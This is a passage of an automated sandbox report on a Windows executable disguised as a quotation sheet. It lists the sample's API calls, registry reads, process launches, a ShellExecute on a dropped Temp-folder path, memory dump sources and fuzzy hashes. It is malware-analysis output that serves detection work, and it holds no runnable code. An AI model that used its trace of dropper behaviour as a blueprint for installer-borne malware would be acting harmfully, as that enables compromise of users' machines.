                                                                                • SetFilePointer.KERNELBASE(0039DC8A,00000000,00000000,004128D8,00004000,?,00000000,00402F8E,00000004,00000000,00000000,?,?,00402F08,000000FF,00000000), ref: 004031A6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: FilePointer$CountTick
                                                                                • String ID:
                                                                                • API String ID: 1092082344-0
                                                                                • Opcode ID: a36c4bf57cb6e858ef063313d681270ada8638ec8a77c6c3e08efa629b838403
                                                                                • Instruction ID: 32da71d67e65fe5252f8ded7d9303c2dcf981c5e4867c3c67dada36b4a4d5a13
                                                                                • Opcode Fuzzy Hash: a36c4bf57cb6e858ef063313d681270ada8638ec8a77c6c3e08efa629b838403
                                                                                • Instruction Fuzzy Hash: DD31B2B29012109FDB10BF2AFE4086A3BECE748356715823BE400B62E0C739DD52DB5E
                                                                                APIs
                                                                                  • Part of subcall function 00406167: FindFirstFileA.KERNELBASE(75DF3410,00421580,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,00405A06,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,75DF3410,?,75DF2EE0,00405725,?,75DF3410,75DF2EE0), ref: 00406172
                                                                                  • Part of subcall function 00406167: FindClose.KERNEL32(00000000), ref: 0040617E
                                                                                • lstrlenA.KERNEL32 ref: 00402212
                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040221C
                                                                                • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 00402244
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                • String ID:
                                                                                • API String ID: 1486964399-0
                                                                                • Opcode ID: 61c72c3acbeab377fc67236d864babf069cda309619979ed43041b7e4bbdfd7d
                                                                                • Instruction ID: 708f0fc9269f5af075d905106071f31bae39c4f67462bfddc0a38c2d79fef8c9
                                                                                • Opcode Fuzzy Hash: 61c72c3acbeab377fc67236d864babf069cda309619979ed43041b7e4bbdfd7d
                                                                                • Instruction Fuzzy Hash: FE112171904318AADB10EFB58945A9EB7F8AF14318F10853BA505FB2D2D6BCC9448B59
                                                                                APIs
                                                                                  • Part of subcall function 0040507C: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
                                                                                  • Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
                                                                                  • Part of subcall function 0040507C: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00402C8E,00402C8E,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,00000000,00000000), ref: 004050D8
                                                                                  • Part of subcall function 0040507C: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll), ref: 004050EA
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138
                                                                                  • Part of subcall function 004055F4: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421538,Error launching installer), ref: 0040561D
                                                                                  • Part of subcall function 004055F4: CloseHandle.KERNEL32(?), ref: 0040562A
                                                                                • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
                                                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                                                • String ID:
                                                                                • API String ID: 3521207402-0
                                                                                • Opcode ID: a33023bfda2542b486336c0229f0f2454b563ffb6bd9b7eab009217adf710acc
                                                                                • Instruction ID: 8164f88ac99e46b686dec60b6f66323921365fc284b2c72d55c18730983d64c3
                                                                                • Opcode Fuzzy Hash: a33023bfda2542b486336c0229f0f2454b563ffb6bd9b7eab009217adf710acc
                                                                                • Instruction Fuzzy Hash: 97015731904114EBDF11AFA1C98899F7BB2EF00344F20817BF601B52E1C7789A419B9A
                                                                                APIs
                                                                                • RegOpenKeyExA.KERNELBASE(80000002,00405F8F,00000000,00000002,?,00000002,?,?,00405F8F,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405D73
                                                                                • RegQueryValueExA.KERNELBASE(?,?,00000000,00405F8F,?,00405F8F), ref: 00405D94
                                                                                • RegCloseKey.KERNELBASE(?), ref: 00405DB5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID:
                                                                                • API String ID: 3677997916-0
                                                                                • Opcode ID: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                                                                • Instruction ID: 75195c41eba113777763a56ee97b1b5287ad365fc5d4740e3ebf2a0583ed9f98
                                                                                • Opcode Fuzzy Hash: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                                                                • Instruction Fuzzy Hash: F9015A7254020AEFDB128F64EC48EEB3FACEF18354F008036F904E6260D235D964CBA5
                                                                                APIs
                                                                                • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\Fordelte,?), ref: 00401E30
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\Fordelte, xrefs: 00401E1B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: ExecuteShell
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\Fordelte
                                                                                • API String ID: 587946157-3731622782
                                                                                • Opcode ID: 32c1cfe14180b42954651c6b61ca40660d18b74b52388fa16c4e3d59ffc5170c
                                                                                • Instruction ID: a7065d45e970d82f7c7c38e61fdd4921630a9aeb0a93d7a2c75a24e3c1af8d4b
                                                                                • Opcode Fuzzy Hash: 32c1cfe14180b42954651c6b61ca40660d18b74b52388fa16c4e3d59ffc5170c
                                                                                • Instruction Fuzzy Hash: 28F04672B041007FDB10ABB19D4AF5E2BA8EB60319F20493BF141F70C2DAFC88419B28
                                                                                APIs
                                                                                • SetFilePointer.KERNELBASE(00000000), ref: 100028A7
                                                                                • GetLastError.KERNEL32 ref: 100029AE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38301650689.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38301620249.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000000.00000002.38301679644.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000000.00000002.38301712469.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastPointer
                                                                                • String ID:
                                                                                • API String ID: 2976181284-0
                                                                                • Opcode ID: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                                • Instruction ID: 700bf99a33fcd989ee77f819fa46e2371db99389a88ce2eb288524e3b596c0af
                                                                                • Opcode Fuzzy Hash: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                                • Instruction Fuzzy Hash: 9751A2BA908214DFFB10DF64DCC674937A4EB443D4F21842AEA08E726DCF34A9808B95
                                                                                APIs
                                                                                • SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,?,?,00402F08,000000FF,00000000,00000000,00409130,?), ref: 00402F81
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: FilePointer
                                                                                • String ID:
                                                                                • API String ID: 973152223-0
                                                                                • Opcode ID: 318766a007564a5c8c6069328ff7bf9d8ddc724485930b67641b25b8ac31027b
                                                                                • Instruction ID: 983d4f283b3a49842741e08d62faa859851885946f81c7e75766fedec90a3088
                                                                                • Opcode Fuzzy Hash: 318766a007564a5c8c6069328ff7bf9d8ddc724485930b67641b25b8ac31027b
                                                                                • Instruction Fuzzy Hash: 32319F70202219EFDF20EF56DD44A9B7BACEB00755F20803AF904E61D0D279DE40DBA9
                                                                                APIs
                                                                                  • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402440
                                                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID:
                                                                                • API String ID: 3677997916-0
                                                                                • Opcode ID: 8647bc16be9bbeeb019502bd2fcd7cece1f0f24b9204c75c98ec28f9745f9c71
                                                                                • Instruction ID: ea61b96732c3ecdd8e38099917432d45b641eb3d8d4d3075f09eb17731070f47
                                                                                • Opcode Fuzzy Hash: 8647bc16be9bbeeb019502bd2fcd7cece1f0f24b9204c75c98ec28f9745f9c71
                                                                                • Instruction Fuzzy Hash: 7111A771905205FFDF14DF64C6889AEBBB4EF11349F20847FE141B62C0D2B84A45DB5A
                                                                                APIs
                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: 6f3fd260d9a20665192313664cef065be83871c58b0681ff97f62226ed226405
                                                                                • Instruction ID: 8ec6bfb8ef4f3ff43576048fe9568e939b5e998f238dec90285f5c94a9fc96e2
                                                                                • Opcode Fuzzy Hash: 6f3fd260d9a20665192313664cef065be83871c58b0681ff97f62226ed226405
                                                                                • Instruction Fuzzy Hash: 2201F431B24210ABE7294B389E04B6A36A8F710314F11823BF911F66F1D7B8DC029B4D
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(?,?,?,00403295,00000009), ref: 0040620E
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406229
                                                                                  • Part of subcall function 0040618E: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004061A5
                                                                                  • Part of subcall function 0040618E: wsprintfA.USER32 ref: 004061DE
                                                                                  • Part of subcall function 0040618E: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004061F2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                • String ID:
                                                                                • API String ID: 2547128583-0
                                                                                • Opcode ID: 2c630675a567476a72db336401282eceef6d354bbdda173821c126d7c14613da
                                                                                • Instruction ID: 835994d0d4e2d07c36af23a3dc0c9bac066575a7a99d708227b603b56203bf9f
                                                                                • Opcode Fuzzy Hash: 2c630675a567476a72db336401282eceef6d354bbdda173821c126d7c14613da
                                                                                • Instruction Fuzzy Hash: 7EE08632A04111BAD650B6745D0496B73AC9B84740302487EF906F2185E7389C3196AA
                                                                                APIs
                                                                                • GetFileAttributesA.KERNELBASE(00000003,00402CF9,C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe,80000000,00000003), ref: 00405ADA
                                                                                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AFC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: File$AttributesCreate
                                                                                • String ID:
                                                                                • API String ID: 415043291-0
                                                                                • Opcode ID: 4a69860c6089f1fb7fd455c1891d9cc54c05e48a968a67635bcc5e625bd0c43f
                                                                                • Instruction ID: 2e597581bf20324382b204af2e2b9293bc3b27f4d9e8cb915424ec39c2be7a6e
                                                                                • Opcode Fuzzy Hash: 4a69860c6089f1fb7fd455c1891d9cc54c05e48a968a67635bcc5e625bd0c43f
                                                                                • Instruction Fuzzy Hash: A7D09E31658201EFFF098F20DD16F2EBBA2EB84B00F10962CBA92941E0D6755815DB26
                                                                                APIs
                                                                                • CreateDirectoryA.KERNELBASE(?,00000000,0040321E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 004055C5
                                                                                • GetLastError.KERNEL32 ref: 004055D3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDirectoryErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1375471231-0
                                                                                • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                                                • Instruction ID: ee333ff4e59061917a1f290c3015eab559b7a368ac9c9957fcbd809aee07952f
                                                                                • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                                                • Instruction Fuzzy Hash: 04C08C31618102EBDB200B30CE08B073E61AB00381F208831A006F10E4CA349000C93F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: wsprintf
                                                                                • String ID:
                                                                                • API String ID: 2111968516-0
                                                                                • Opcode ID: 97c6a5e1d166d86dd5d038022cf0a981cbb0fc355984b71d19d783c84eb5d483
                                                                                • Instruction ID: 55544bde1ffbc8e2725db5e9f059dcd5497d6f225edeae162a206f27e82fdad8
                                                                                • Opcode Fuzzy Hash: 97c6a5e1d166d86dd5d038022cf0a981cbb0fc355984b71d19d783c84eb5d483
                                                                                • Instruction Fuzzy Hash: F721FB70C04299BEDF318B584A585AFBF74AF11318F1484BBE491B62D1C1BD8A85DF1D
                                                                                APIs
                                                                                • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Open
                                                                                • String ID:
                                                                                • API String ID: 71445658-0
                                                                                • Opcode ID: ed1d997f1767e4ebe1524a955060e6e59f62574de8c72c2eb948d7caa6f8d669
                                                                                • Instruction ID: 806e3b40af95552ac91145e5354a2e2caa18036cb762c00ee55acc3717e10e35
                                                                                • Opcode Fuzzy Hash: ed1d997f1767e4ebe1524a955060e6e59f62574de8c72c2eb948d7caa6f8d669
